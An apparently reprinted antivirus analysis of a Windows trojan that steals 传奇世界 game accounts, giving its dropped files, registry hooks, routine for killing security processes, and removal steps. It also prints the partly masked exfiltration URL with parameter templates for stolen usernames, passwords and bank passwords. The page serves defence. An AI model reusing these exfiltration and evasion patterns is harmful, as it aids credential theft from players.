Trojan/Win32.OnLineGames.bkzg[GameThief]

王朝百科·作者佚名  2010-06-18  
宽屏版  字体: |||超大  

病毒标签病毒名称: Trojan/Win32.OnLineGames.bkzg[GameThief]

病毒类型: 木马

文件 MD5: D8FA90F2A769C994081321D805E91C8E

公开范围: 完全公开

危害等级: 3

文件长度: 15,301 字节

感染系统: Windows98以上版本

开发工具: Microsoft Visual C++ 6.0

加壳类型: FSG 2.0

病毒描述该病毒为盗取传奇世界游戏账号类木马,病毒运行后获取随即八位字母,依次为病毒名,以nls为扩展名衍生病毒文件到%Windir%fonts目录下,加载dll文件并调用dll中的功能模块,执行注册dll,修改注册表添加hook项等操作;遍历进程列表,检测进程中调用了woool.dat文件的进程并将之关闭。为命令行创建线程删除病毒本体。Dll文件被加载后重新加载自身,检测360相关进程成并将之关闭。检测传奇世界进程。发现后捕获用户输入,发送到指定的收取页面。

行为分析-本地行为1、文件运行后会释放以下文件

%Windir%Fontsgzcqsj01.dat 42 字节

%Windir%Fontspddwrwks.nls 49,152 字节[8位随机文件名]

2、新增注册表

[HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}InprocServer32]

注册表值: "@"

类型: REG_SZ

值: "C:WINDOWSfontspddwrwks.nls"

描述:为动态链接库文件注册ID

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]

注册表值: "{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}"

类型: REG_SZ

值: ""

描述:添加hook用以截获用户的相关信息

行为分析-网络行为收信地址:

http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp

回传参数:

格式1:

http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp?gametype=cqsj&para=%s&%ver=0316&zone=%s&server

=%s&name=%s&password=%s&secopass=%s&nickname=%s&lord=%s&level=%s&money=%u&goldcoin=%u&yb=%u&equipment

=%s&bag=%s&mb=%d&mbtime=%d&hardinfo=%s&norefreshcode=%s

格式2:

http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp?gametype=cqsj&name=%s&password=%s&zone=%s&server

=%s&bankpass=%s&level=%s&mb=%d&norefreshcode=%s

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32,windows95/98/me中默认的安装路径是C:WindowsSystem,windowsXP中默认的安装路径是C:WindowsSystem32。

%Temp% = C:Documents and SettingsAAAAALocal SettingsTemp 当前用户TEMP缓存变量

%Windir% WINDODWS所在目录

%DriveLetter% 逻辑驱动器根目录

%ProgramFiles% 系统程序默认安装目录

%HomeDrive% = C: 当前启动的系统的所在分区

%Documents and Settings% 当前用户文档根目录

清除方案1、使用安天防线可彻底清除此病毒。

2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。

(1) 恢复修改的注册表

[HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}InprocServer32]

注册表值: "@"

类型: REG_SZ

值: "C:WINDOWSfontspddwrwks.nls"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]

注册表值: "{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}"

类型: REG_SZ

值: ""

(2) 重新启动计算机,删除病毒文件

%Windir%Fontsgzcqsj01.dat

%Windir%Fontspddwrwks.nls[随即8位文件名]

 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
© 2005- 王朝百科 版权所有